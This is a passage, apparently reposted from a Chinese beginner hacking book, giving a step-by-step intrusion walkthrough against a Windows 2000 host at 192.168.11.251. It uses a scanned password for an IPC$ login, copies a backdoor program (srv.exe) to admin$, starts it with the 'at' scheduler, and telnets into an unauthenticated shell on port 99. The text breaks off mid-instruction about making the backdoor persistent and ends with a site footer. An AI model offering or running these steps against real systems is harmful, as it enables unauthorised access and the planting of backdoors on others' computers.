下面我們以192.168.11.251 這個IP 地址為例進行講解，得到密碼后，是如何獲取對方的資源并留下后門的。
打開W i n d o w s 2 0 0 0 自帶的命令提示行（在運行框里輸入“c m d ”命令），進入命令窗口，運行：
① C:\〉net use \\192.168.11.251\IPC$ 密碼 /user:用戶名
其中，用戶名是用流光掃描到的用戶，密碼為該用戶的密碼。用此命令可以與1 9 2 . 1 6 8 . 1 1 . 2 5 1 建立一個連
接，運行后顯示“命令成功完成”。這樣通過I P C $ 的遠程登錄就成功了。
② C:\〉copy srv.exe \\192.168.11.251\admin$
登陸成功之后先復制一個T e l n e t 的程序上去，（小榕流光安裝目錄下的T o o l s 目錄里的S r v . e x e ），這個程
序是在目標主機上面開一個Telnet 服務，端口為9 9（或者用其他后門軟件開一個端口以供登錄）。這里的admin$
指的是c:\winnt\system32 目錄，還可以使用c $、d $，即C 盤與D 盤，這要看你復制到什么地方，以后可以利
用定時服務啟動它。
③ C:\〉net time \\192.168.11.251
在啟動定時服務之前，需要先了解對方的時間。用此命令可以檢查目標計算機的時間。假設192.168.11.251
的當前時間是2002/7/19 上午11:00 ，命令成功完成。
④ C:\〉at \\192.168.11.251 11:05 srv.exe
檢查到目標計算機的時間后，就可以用a t 命令啟動s r v . e x e 了，這里設置的時間要在目標計算機時間后，
否則啟動不了。顯示：新加了一項作業，其作業 ID = 0。
⑤ C:\〉net time \\192.168.11.251
再查查到時間沒有，如果192.168.11.251 的當前時間是2002/7/19 上午11:05，那就準備開始下面的命令。
⑥ C:\〉telnet 192.168.11.251 99
這里用Telnet 命令登錄上去，注意端口是99。Telnet 默認的是23 端口，但是我們使用 srv.exe 在對方計
算機中為我們建立一個99 端口的Shell。這里不需要驗證身份，直接登錄，如果顯示：c:\winnt\system32〉，表
明成功登錄上去了。
雖然我們T e l n e t 上去了，但是s r v . e x e 是一次性的，下次登錄還要再激活！所以需要建立一個T e l n e t 服
務！這就要用到n t l m （在小榕流光安裝目錄下的T o o l s 目錄里也可以找到）。然后在本地打開命令提示符，另外
打開一個窗口，輸入：

總結

以上是生活随笔為你收集整理的[黑客入门全程图解].吴自容,武新华.等编著.文字版,精确还原的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。